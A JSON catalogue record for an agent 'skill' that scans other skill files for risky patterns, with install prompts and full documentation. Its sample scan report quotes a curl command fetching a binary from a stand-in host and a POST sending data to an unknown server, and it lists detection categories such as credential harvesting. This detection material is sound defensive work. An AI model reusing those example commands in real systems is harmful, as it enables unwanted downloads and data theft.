{ "schemaVersion": "1.0", "item": { "slug": "security-skill-scanner", "name": "Security Skill Scanner", "source": "tencent", "type": "skill", "category": "其他", "sourceUrl": "https://clawhub.ai/anikrahman0/security-skill-scanner", "canonicalUrl": "https://clawhub.ai/anikrahman0/security-skill-scanner", "targetPlatform": "OpenClaw" }, "install": { "downloadMode": "redirect", "downloadUrl": "/downloads/security-skill-scanner", "sourceDownloadUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=security-skill-scanner", "sourcePlatform": "tencent", "targetPlatform": "OpenClaw", "installMethod": "Manual import", "extraction": "Extract archive", "prerequisites": [ "OpenClaw" ], "packageFormat": "ZIP package", "includedAssets": [ ".gitignore", "CHANGELOG.md", "CONTRIBUTING.md", "package.json", "README.md", "scanner.js" ], "primaryDoc": "SKILL.md", "quickSetup": [ "Download the package from Yavira.", "Extract the archive and review SKILL.md first.", "Import or place the package into your OpenClaw setup." ], "agentAssist": { "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.", "steps": [ "Download the package from Yavira.", "Extract it into a folder your agent can access.", "Paste one of the prompts below and point your agent at the extracted folder." ], "prompts": [ { "label": "New install", "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Then review README.md for any prerequisites, environment setup, or post-install checks. Tell me what you changed and call out any manual steps you could not complete." }, { "label": "Upgrade existing", "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Then review README.md for any prerequisites, environment setup, or post-install checks. Summarize what changed and any follow-up checks I should run." } ] }, "sourceHealth": { "source": "tencent", "status": "healthy", "reason": "direct_download_ok", "recommendedAction": "download", "checkedAt": "2026-04-23T16:43:11.935Z", "expiresAt": "2026-04-30T16:43:11.935Z", "httpStatus": 200, "finalUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard", "contentType": "application/zip", "probeMethod": "head", "details": { "probeUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard", "contentDisposition": "attachment; filename=\"4claw-imageboard-1.0.1.zip\"", "redirectLocation": null, "bodySnippet": null }, "scope": "source", "summary": "Source download looks usable.", "detail": "Yavira can redirect you to the upstream package for this source.", "primaryActionLabel": "Download for OpenClaw", "primaryActionHref": "/downloads/security-skill-scanner" }, "validation": { "installChecklist": [ "Use the Yavira download entry.", "Review SKILL.md after the package is downloaded.", "Confirm the extracted package contains the expected setup assets." ], "postInstallChecks": [ "Confirm the extracted package includes the expected docs or setup files.", "Validate the skill or prompts are available in your target agent workspace.", "Capture any manual follow-up steps the agent could not complete." ] }, "downloadPageUrl": "https://openagent3.xyz/downloads/security-skill-scanner", "agentPageUrl": "https://openagent3.xyz/skills/security-skill-scanner/agent", "manifestUrl": "https://openagent3.xyz/skills/security-skill-scanner/agent.json", "briefUrl": "https://openagent3.xyz/skills/security-skill-scanner/agent.md" }, "agentAssist": { "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.", "steps": [ "Download the package from Yavira.", "Extract it into a folder your agent can access.", "Paste one of the prompts below and point your agent at the extracted folder." ], "prompts": [ { "label": "New install", "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Then review README.md for any prerequisites, environment setup, or post-install checks. Tell me what you changed and call out any manual steps you could not complete." }, { "label": "Upgrade existing", "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Then review README.md for any prerequisites, environment setup, or post-install checks. Summarize what changed and any follow-up checks I should run." } ] }, "documentation": { "source": "clawhub", "primaryDoc": "SKILL.md", "sections": [ { "title": "Description", "body": "A security-focused skill that analyzes OpenClaw SKILL.md files and skill packages for potential security risks, malicious patterns, and suspicious behaviors. This tool helps protect your system by detecting:\n\nHidden external downloads or executables\nSuspicious API calls and endpoints\nDangerous file system operations\nObfuscated or encoded commands\nUnusual prerequisite requirements\nKnown malicious patterns\n\nWhy this matters: This scanner helps you review skills before installation by flagging potentially suspicious instruction patterns." }, { "title": "Features", "body": "✅ Pattern Detection: Identifies suspicious code patterns and behaviors\n✅ Prerequisite Analysis: Validates required dependencies and downloads\n✅ API Endpoint Validation: Checks for suspicious external connections\n✅ File System Auditing: Detects dangerous file operations\n✅ Encoding Detection: Flags base64, hex, and other obfuscation attempts\n✅ Risk Scoring: Assigns risk levels (LOW, MEDIUM, HIGH, CRITICAL)\n✅ Detailed Reports: Provides clear explanations of findings\n✅ Whitelist Support: Configure trusted domains and patterns" }, { "title": "How It Works", "body": "This is an OpenClaw skill (not a standalone program). When you ask the agent to scan a skill file:\n\nThe agent reads this security-scanner skill to learn what patterns to look for\nThe agent reads the skill file you want to scan\nThe agent analyzes the instructions and reports findings\nYou manually review the flagged items\n\nNote: The included scanner.js file can also be run directly with Node.js 18+ if you prefer command-line usage." }, { "title": "Installation", "body": "Install via ClawHub or add to your OpenClaw skills directory.\n\nFor command-line usage (optional):\n\n# Clone the repository\ngit clone https://github.com/anikrahman0/security-skill-scanner.git\ncd security-skill-scanner\n\n# Run the scanner\nnode scanner.js path/to/SKILL.md" }, { "title": "Configuration", "body": "Create a .security-scanner-config.json in your OpenClaw directory (optional):\n\n{\n \"whitelistedDomains\": [\n \"github.com\",\n \"api.openai.com\",\n \"api.anthropic.com\",\n \"raw.githubusercontent.com\"\n ],\n \"whitelistedCommands\": [\n \"npm install\",\n \"pip install\"\n ],\n \"strictMode\": false\n}" }, { "title": "Scan a SKILL.md file", "body": "User: \"Scan the skill file at ~/Downloads/new-skill/SKILL.md for security issues\"\nAgent: [Runs security scan and reports findings]" }, { "title": "Scan before installation", "body": "User: \"I have the email-automation skill file. Can you scan it for security risks?\"\n[User uploads the SKILL.md file]\nAgent: [Reads and analyzes the skill file, provides risk assessment]\n\nImportant: If you ask Claude to download a skill from the internet first, that download step will use network access (though the scanner itself runs offline)." }, { "title": "Batch scan all installed skills", "body": "User: \"Scan all my installed OpenClaw skills for security issues\"\nAgent: [Scans all skills in ~/.openclaw/skills/ and generates report]" }, { "title": "🔴 CRITICAL Risks", "body": "Shell command injection attempts\nExternal executable downloads (curl/wget binaries)\nSuspicious eval() or exec() usage\nCredential harvesting patterns\nKnown malware signatures" }, { "title": "🟠 HIGH Risks", "body": "Unvalidated external API calls\nFile system write access to sensitive directories\nBase64 or hex encoded commands\nRequests to unknown domains\nPrivilege escalation attempts" }, { "title": "🟡 MEDIUM Risks", "body": "Extensive file system read access\nNetwork requests without HTTPS\nLarge numbers of dependencies\nUnusual prerequisite requests\nDeprecated or vulnerable packages" }, { "title": "🟢 LOW Risks", "body": "Minor code quality issues\nMissing error handling\nIncomplete documentation\nNon-critical warnings" }, { "title": "This Scanner WILL Flag Legitimate Patterns", "body": "The scanner uses regex patterns that may match innocent code. Common false positives:\n\n✗ Backticks in markdown - Code examples using backticks\n✗ Template strings - Documentation showing ${variable} syntax\n✗ Base64 examples - Skills demonstrating encoding/decoding\n✗ Package managers - Legitimate npm install or pip install commands\n✗ GitHub URLs - Links to raw.githubusercontent.com" }, { "title": "What This Actually Scans", "body": "Skills are markdown instruction files, not executable code. This scanner:\n\n✅ Reads the markdown text of skill files\n✅ Looks for instruction patterns that might be concerning\n✅ Flags items for your manual review\n❌ Does NOT scan for executable malware (skills aren't programs)\n❌ Does NOT provide definitive verdicts" }, { "title": "Your Responsibility", "body": "YOU must review all flagged items in context. Ask yourself:\n\nDoes this pattern make sense for what the skill does?\nIs the author trustworthy?\nAre the instructions clear and reasonable?\n\nWhen in doubt, ask the skill author or community." }, { "title": "Output Format", "body": "=== Security Scan Report ===\nSkill: email-automation\nScanned: 2024-02-09 14:30:22\nOverall Risk: HIGH ⚠️\n\nFINDINGS:\n[CRITICAL] External Binary Download Detected\n Location: Line 45 in prerequisites\n Pattern: curl https://unknown-site.com/tool -o /usr/local/bin/helper\n Risk: This downloads and executes an external binary from an untrusted source\n Recommendation: DO NOT INSTALL - Manual verification required\n\n[HIGH] Suspicious API Endpoint\n Location: Line 89 in execute()\n Pattern: POST to http://data-collector.xyz/log\n Risk: Sends data to unknown third-party server\n Recommendation: Review what data is being sent\n\n[MEDIUM] Unencrypted Network Request\n Location: Line 102\n Pattern: HTTP instead of HTTPS\n Risk: Data transmitted without encryption\n Recommendation: Request HTTPS version\n\nSUMMARY:\nTotal Issues: 3\nCritical: 1\nHigh: 1\nMedium: 1\nLow: 0\n\nRECOMMENDATION: ❌ DO NOT INSTALL\nThis skill has critical security issues that pose significant risk to your system." }, { "title": "Scenario 1: Clean Skill", "body": "User: \"Scan the weather-checker skill\"\nAgent: \"✅ SAFE - No security issues detected. The skill uses standard API calls\n to api.weatherapi.com with proper HTTPS and no file system access.\"" }, { "title": "Scenario 2: Suspicious Skill", "body": "User: \"Should I install the productivity-helper skill?\"\nAgent: \"⚠️ WARNING - This skill attempts to download an external binary and\n makes requests to an unknown domain. Risk Level: CRITICAL\n Recommendation: DO NOT INSTALL\"" }, { "title": "Scenario 3: Minor Issues", "body": "User: \"Analyze the note-taker skill\"\nAgent: \"⚠️ CAUTION - Risk Level: LOW\n Found 2 minor issues:\n - Uses HTTP instead of HTTPS for icon download\n - Missing input validation on file paths\n These can likely be fixed. Consider contacting the author.\"" }, { "title": "Security Guarantees", "body": "This scanner itself is designed with security in mind:\n\n✅ No Network Access: The scanner itself runs completely offline (but if you ask Claude to download a skill file first, that download uses network)\n✅ No External Dependencies: Pure JavaScript/Node.js\n✅ Read-Only: Never modifies files being scanned\n✅ No Telemetry: Doesn't send data anywhere\n✅ Open Source: All code is auditable\n✅ Sandboxed: Doesn't execute code from scanned skills" }, { "title": "False Positives", "body": "The scanner may flag legitimate uses of certain patterns. Common false positives:\n\nnpm/pip installs: Legitimate package managers may trigger warnings\nGitHub URLs: Raw GitHub content URLs are generally safe\nConfig files: Skills that write to config files may be flagged\nLog files: Creating log files may trigger file system warnings\n\nUse judgment and review flagged items in context." }, { "title": "Limitations", "body": "Cannot detect zero-day exploits or novel attack vectors\nMay miss sophisticated obfuscation techniques\nRequires human judgment for final decision\nCannot scan encrypted or compiled code\nPattern-based detection can have false positives\n\nThis tool is a helpful first line of defense, but not a replacement for careful review." }, { "title": "Contributing", "body": "Found a malicious pattern not detected? Submit an issue or PR with:\n\nThe malicious pattern\nExample skill that uses it\nSuggested detection method" }, { "title": "Roadmap", "body": "Machine learning-based pattern detection\n Integration with VirusTotal API (optional)\n Automatic skill reputation checking\n Community-sourced malware signatures\n Browser extension for ClawHub.ai scanning\n CI/CD integration for skill developers" }, { "title": "Support", "body": "Report issues: https://github.com/anikrahman0/security-skill-scanner/issues\nSuggest improvements: Pull requests welcome\nSecurity concerns: a7604366@gmail.com" }, { "title": "License", "body": "MIT License - Free to use, modify, and distribute" }, { "title": "Disclaimer", "body": "This tool provides pattern-based security scanning with expected false positives. It scans instruction files (markdown), not executable code.\n\nCritical: This scanner cannot provide definitive security verdicts. All flagged items require manual review in context. Skills are instructions for Claude to read, not programs that execute automatically.\n\nAlways review skills carefully before installation, especially those requiring system-level permissions. The authors are not responsible for any damages resulting from use of this tool or installation of scanned skills.\n\nRemember: If a skill seems too good to be true or requests unusual permissions, it probably is suspicious. When in doubt, don't install it." } ], "body": "Security Scanner\nDescription\n\nA security-focused skill that analyzes OpenClaw SKILL.md files and skill packages for potential security risks, malicious patterns, and suspicious behaviors. This tool helps protect your system by detecting:\n\nHidden external downloads or executables\nSuspicious API calls and endpoints\nDangerous file system operations\nObfuscated or encoded commands\nUnusual prerequisite requirements\nKnown malicious patterns\n\nWhy this matters: This scanner helps you review skills before installation by flagging potentially suspicious instruction patterns.\n\nFeatures\n✅ Pattern Detection: Identifies suspicious code patterns and behaviors\n✅ Prerequisite Analysis: Validates required dependencies and downloads\n✅ API Endpoint Validation: Checks for suspicious external connections\n✅ File System Auditing: Detects dangerous file operations\n✅ Encoding Detection: Flags base64, hex, and other obfuscation attempts\n✅ Risk Scoring: Assigns risk levels (LOW, MEDIUM, HIGH, CRITICAL)\n✅ Detailed Reports: Provides clear explanations of findings\n✅ Whitelist Support: Configure trusted domains and patterns\nHow It Works\n\nThis is an OpenClaw skill (not a standalone program). When you ask the agent to scan a skill file:\n\nThe agent reads this security-scanner skill to learn what patterns to look for\nThe agent reads the skill file you want to scan\nThe agent analyzes the instructions and reports findings\nYou manually review the flagged items\n\nNote: The included scanner.js file can also be run directly with Node.js 18+ if you prefer command-line usage.\n\nInstallation\n\nInstall via ClawHub or add to your OpenClaw skills directory.\n\nFor command-line usage (optional):\n\n# Clone the repository\ngit clone https://github.com/anikrahman0/security-skill-scanner.git\ncd security-skill-scanner\n\n# Run the scanner\nnode scanner.js path/to/SKILL.md\n\nConfiguration\n\nCreate a .security-scanner-config.json in your OpenClaw directory (optional):\n\n{\n \"whitelistedDomains\": [\n \"github.com\",\n \"api.openai.com\",\n \"api.anthropic.com\",\n \"raw.githubusercontent.com\"\n ],\n \"whitelistedCommands\": [\n \"npm install\",\n \"pip install\"\n ],\n \"strictMode\": false\n}\n\nUsage\nScan a SKILL.md file\nUser: \"Scan the skill file at ~/Downloads/new-skill/SKILL.md for security issues\"\nAgent: [Runs security scan and reports findings]\n\nScan before installation\nUser: \"I have the email-automation skill file. Can you scan it for security risks?\"\n[User uploads the SKILL.md file]\nAgent: [Reads and analyzes the skill file, provides risk assessment]\n\n\nImportant: If you ask Claude to download a skill from the internet first, that download step will use network access (though the scanner itself runs offline).\n\nBatch scan all installed skills\nUser: \"Scan all my installed OpenClaw skills for security issues\"\nAgent: [Scans all skills in ~/.openclaw/skills/ and generates report]\n\nWhat It Detects\n🔴 CRITICAL Risks\nShell command injection attempts\nExternal executable downloads (curl/wget binaries)\nSuspicious eval() or exec() usage\nCredential harvesting patterns\nKnown malware signatures\n🟠 HIGH Risks\nUnvalidated external API calls\nFile system write access to sensitive directories\nBase64 or hex encoded commands\nRequests to unknown domains\nPrivilege escalation attempts\n🟡 MEDIUM Risks\nExtensive file system read access\nNetwork requests without HTTPS\nLarge numbers of dependencies\nUnusual prerequisite requests\nDeprecated or vulnerable packages\n🟢 LOW Risks\nMinor code quality issues\nMissing error handling\nIncomplete documentation\nNon-critical warnings\n⚠️ IMPORTANT: False Positives & Limitations\nThis Scanner WILL Flag Legitimate Patterns\n\nThe scanner uses regex patterns that may match innocent code. Common false positives:\n\n✗ Backticks in markdown - Code examples using backticks\n✗ Template strings - Documentation showing ${variable} syntax\n✗ Base64 examples - Skills demonstrating encoding/decoding\n✗ Package managers - Legitimate npm install or pip install commands\n✗ GitHub URLs - Links to raw.githubusercontent.com\nWhat This Actually Scans\n\nSkills are markdown instruction files, not executable code. This scanner:\n\n✅ Reads the markdown text of skill files\n✅ Looks for instruction patterns that might be concerning\n✅ Flags items for your manual review\n❌ Does NOT scan for executable malware (skills aren't programs)\n❌ Does NOT provide definitive verdicts\nYour Responsibility\n\nYOU must review all flagged items in context. Ask yourself:\n\nDoes this pattern make sense for what the skill does?\nIs the author trustworthy?\nAre the instructions clear and reasonable?\n\nWhen in doubt, ask the skill author or community.\n\nOutput Format\n=== Security Scan Report ===\nSkill: email-automation\nScanned: 2024-02-09 14:30:22\nOverall Risk: HIGH ⚠️\n\nFINDINGS:\n[CRITICAL] External Binary Download Detected\n Location: Line 45 in prerequisites\n Pattern: curl https://unknown-site.com/tool -o /usr/local/bin/helper\n Risk: This downloads and executes an external binary from an untrusted source\n Recommendation: DO NOT INSTALL - Manual verification required\n\n[HIGH] Suspicious API Endpoint\n Location: Line 89 in execute()\n Pattern: POST to http://data-collector.xyz/log\n Risk: Sends data to unknown third-party server\n Recommendation: Review what data is being sent\n\n[MEDIUM] Unencrypted Network Request\n Location: Line 102\n Pattern: HTTP instead of HTTPS\n Risk: Data transmitted without encryption\n Recommendation: Request HTTPS version\n\nSUMMARY:\nTotal Issues: 3\nCritical: 1\nHigh: 1\nMedium: 1\nLow: 0\n\nRECOMMENDATION: ❌ DO NOT INSTALL\nThis skill has critical security issues that pose significant risk to your system.\n\nExample Scenarios\nScenario 1: Clean Skill\nUser: \"Scan the weather-checker skill\"\nAgent: \"✅ SAFE - No security issues detected. The skill uses standard API calls\n to api.weatherapi.com with proper HTTPS and no file system access.\"\n\nScenario 2: Suspicious Skill\nUser: \"Should I install the productivity-helper skill?\"\nAgent: \"⚠️ WARNING - This skill attempts to download an external binary and\n makes requests to an unknown domain. Risk Level: CRITICAL\n Recommendation: DO NOT INSTALL\"\n\nScenario 3: Minor Issues\nUser: \"Analyze the note-taker skill\"\nAgent: \"⚠️ CAUTION - Risk Level: LOW\n Found 2 minor issues:\n - Uses HTTP instead of HTTPS for icon download\n - Missing input validation on file paths\n These can likely be fixed. Consider contacting the author.\"\n\nSecurity Guarantees\n\nThis scanner itself is designed with security in mind:\n\n✅ No Network Access: The scanner itself runs completely offline (but if you ask Claude to download a skill file first, that download uses network)\n✅ No External Dependencies: Pure JavaScript/Node.js\n✅ Read-Only: Never modifies files being scanned\n✅ No Telemetry: Doesn't send data anywhere\n✅ Open Source: All code is auditable\n✅ Sandboxed: Doesn't execute code from scanned skills\nFalse Positives\n\nThe scanner may flag legitimate uses of certain patterns. Common false positives:\n\nnpm/pip installs: Legitimate package managers may trigger warnings\nGitHub URLs: Raw GitHub content URLs are generally safe\nConfig files: Skills that write to config files may be flagged\nLog files: Creating log files may trigger file system warnings\n\nUse judgment and review flagged items in context.\n\nLimitations\nCannot detect zero-day exploits or novel attack vectors\nMay miss sophisticated obfuscation techniques\nRequires human judgment for final decision\nCannot scan encrypted or compiled code\nPattern-based detection can have false positives\n\nThis tool is a helpful first line of defense, but not a replacement for careful review.\n\nContributing\n\nFound a malicious pattern not detected? Submit an issue or PR with:\n\nThe malicious pattern\nExample skill that uses it\nSuggested detection method\nRoadmap\n Machine learning-based pattern detection\n Integration with VirusTotal API (optional)\n Automatic skill reputation checking\n Community-sourced malware signatures\n Browser extension for ClawHub.ai scanning\n CI/CD integration for skill developers\nSupport\nReport issues: https://github.com/anikrahman0/security-skill-scanner/issues\nSuggest improvements: Pull requests welcome\nSecurity concerns: a7604366@gmail.com\nLicense\n\nMIT License - Free to use, modify, and distribute\n\nDisclaimer\n\nThis tool provides pattern-based security scanning with expected false positives. It scans instruction files (markdown), not executable code.\n\nCritical: This scanner cannot provide definitive security verdicts. All flagged items require manual review in context. Skills are instructions for Claude to read, not programs that execute automatically.\n\nAlways review skills carefully before installation, especially those requiring system-level permissions. The authors are not responsible for any damages resulting from use of this tool or installation of scanned skills.\n\nRemember: If a skill seems too good to be true or requests unusual permissions, it probably is suspicious. When in doubt, don't install it." }, "trust": { "sourceLabel": "tencent", "provenanceUrl": "https://clawhub.ai/anikrahman0/security-skill-scanner", "publisherUrl": "https://clawhub.ai/anikrahman0/security-skill-scanner", "owner": "anikrahman0", "version": "2.0.0", "license": null, "verificationStatus": "Indexed source record" }, "links": { "detailUrl": "https://openagent3.xyz/skills/security-skill-scanner", "downloadUrl": "https://openagent3.xyz/downloads/security-skill-scanner", "agentUrl": "https://openagent3.xyz/skills/security-skill-scanner/agent", "manifestUrl": "https://openagent3.xyz/skills/security-skill-scanner/agent.json", "briefUrl": "https://openagent3.xyz/skills/security-skill-scanner/agent.md" } }